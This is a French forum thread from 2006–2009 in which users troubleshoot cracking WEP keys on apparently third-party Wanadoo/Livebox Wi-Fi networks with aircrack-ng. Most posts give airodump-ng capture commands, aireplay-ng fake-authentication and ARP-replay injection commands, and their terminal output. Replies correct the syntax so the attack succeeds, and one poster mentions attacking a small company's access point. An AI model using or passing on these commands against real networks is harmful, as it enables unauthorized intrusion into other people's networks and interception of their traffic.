Association impossible / ARPreplay qui marche / IVs qui stagnent (Page 1) / Crack de clef wep / Forum d'entraide: tuto-fr.com

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 28-12-2006 17:59:51

ghja
Membre
Inscription : 28-12-2006
Messages : 1

Association impossible / ARPreplay qui marche / IVs qui stagnent

Bonjour,

Je patauge, malgré de nombreux tests.
(sous Mandriva, avec aircrack-ng)


[b]airodump-ng -c 10 -w test ath2[/b]

BSSID              PWR  Beacons   # Data  CH  MB  ENC   ESSID

00:16:41:4F:xx:xx   92        9        9  10  54  WEP   Wanadoo_xxxx

BSSID              STATION            PWR  Packets  Probes

00:16:41:4F:xx:xx 00:09:5B:65:xx:xx   94      334    Machinchose



Je dispose donc de l'adresse Mac de la station, mais je n'arrive pas à avoir d'Association


aireplay-ng -1 0 -e Machinchose -a 00:16:41:4F:xx:xx -h 00:09:5B:65:xx:xx ath2

17:48:25  Sending Authentication Request
17:48:26  AP rejects the source MAC address ?
17:48:26  Authentication failed (code 1)
17:48:29  Sending Authentication Request

Attack was unsuccessful.



je n'arrive pas à avoir d'Association Successfull ...
j'ai donc testé la méthode ARP replay,

aireplay-ng --arpreplay -e Machinchose -b 00:16:41:4F:xx:xx -h 00:09:5B:65:xx:xx  ath2

Au bout de quelques dizaines de minutes, j'arrive à avoir de nombreux « ARP requests ».

Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 125781 packets (got 7620 ARP requests), sent 328734 packets...

Mais je n'arrive pas à injecter / faire augmenter le nombre de paquets Ivs, qui reste de l'ordre de quelques dizaines.

BSSID              PWR  Beacons   # Data  CH  MB  ENC   ESSID

00:16:41:4F:xx:xx   94     1675       17  10  54  WEP   Wanadoo_xxxx

BSSID              STATION            PWR  Packets  Probes

00:16:41:4F:xx:xx  00:09:5B:65:xx:xx   99    98881  Machinchose


J'ai pas mal cherché sur le Net, mais il y a peu de documentation pour les cas où il n'y a pas d'association.

Quelqu'un aurait-il une idée ?

merci pour votre aide.

Ghja

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 28-12-2006 18:10:37

charly5942
Membre d'honneur
Lieu : Lille
Inscription : 30-04-2007
Messages : 1 027

Re : Association impossible / ARPreplay qui marche / IVs qui stagnent

Bizarre la différence que tu fais entre Wanadoo et Machinchose ( en tout cas c'est bien de masquer!!).... La station est forcément connectée au réseau Wanadoo et Machinchose correspond juste à un réseau présent dans ses réseaux favoris (voir http://forum.tuto-fr.com/viewtopic.php?id=1281  diffusion BSSID)

Donc essaye en utilisant cette syntaxe là:
aireplay-ng -1 0 -e Wanadoo_xxxx -a 00:16:41:4F:xx:xx -b 00:16:41:4F:xx:xx -h 00:09:5B:65:xx:xx ath2
et vois ce que ca donne


Matos: TP-Link TL-WN660G (chipset AR5005GS); Linksys WUSB54G V4; Atheros AR5005G
Dual boot XP / BT3 BETA
Tout message privé (MP) non sollicité sera immédiatement poubellisé sans être lu et par conséquent n'apportera aucune réponse !!! :-)

Hors Ligne

#3 28-12-2006 20:00:37

zac
Membre d'honneur
Inscription : 22-06-2006
Messages : 678

Re : Association impossible / ARPreplay qui marche / IVs qui stagnent

ça met déjà arrivé sur un AP d'une petit entreprise informatique. Mon attaque aireplay était rejeté au premier arp prit...

Hors Ligne

#4 29-12-2006 11:01:44

rv11
Invité

Re : Association impossible / ARPreplay qui marche / IVs qui stagnent

il faut bien respecter les majuscules et minuscule pour le nom ESSID (Wanadoo_xxxx) - le W en majucule est important

#5 29-12-2006 11:09:16

jerguitariste
Membre
Inscription : 15-01-2006
Messages : 77

Re : Association impossible / ARPreplay qui marche / IVs qui stagnent

Oui mais je le redis ca ne marche plus sur livebox-xxx ou wanadoo-xxx
injection OK mais les iv's n'augmente pas

Hors Ligne

#6 03-10-2009 00:08:27

iConqueror
Membre
Inscription : 03-10-2009
Messages : 1

Re : Association impossible / ARPreplay qui marche / IVs qui stagnent

Bjr,

Le tuot date un peu jespere qu'il y a quelqu'un qui pourrat me repondre. je piétine. donc :

avec airmon-ng pas de probleme.
avec airodump-ng non plus le #data augmente
aireplay c la que sa se corse roll

# aireplay-ng -3 -e (ESSID) -b 00:1A:6B:XX:XX:XXX -h 00:2A:7C:XX:XX:XX -x 600 mon0

sa envoye bien des paquet mais les arp n'augmente pas

et aircrack-ng ne trouve pas les files *.ivs

merci, bien a celui qui repondera.

Hors Ligne

#7 03-10-2009 02:22:01

dédé
Membre
Inscription : 25-11-2007
Messages : 987
Site Web

Re : Association impossible / ARPreplay qui marche / IVs qui stagnent

et aircrack-ng ne trouve pas les files *.ivs

parceque tu sauvegardes pas en ivs peut etre
airodump-ng -w w -c 11 wlan0
(-c c'est e canal wlan0 la carte wifi, a remplacer par ce qui convient a ta configuration
aircrack-ng *cap

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
0 3429 02-02-2011 22:35:58 par dclem51
2 1484 24-06-2010 19:59:15 par M1ck3y
1 3509 14-11-2009 23:38:55 par dédé
3 940 07-05-2009 11:40:51 par dédé
4 1030 30-04-2009 10:13:59 par dédé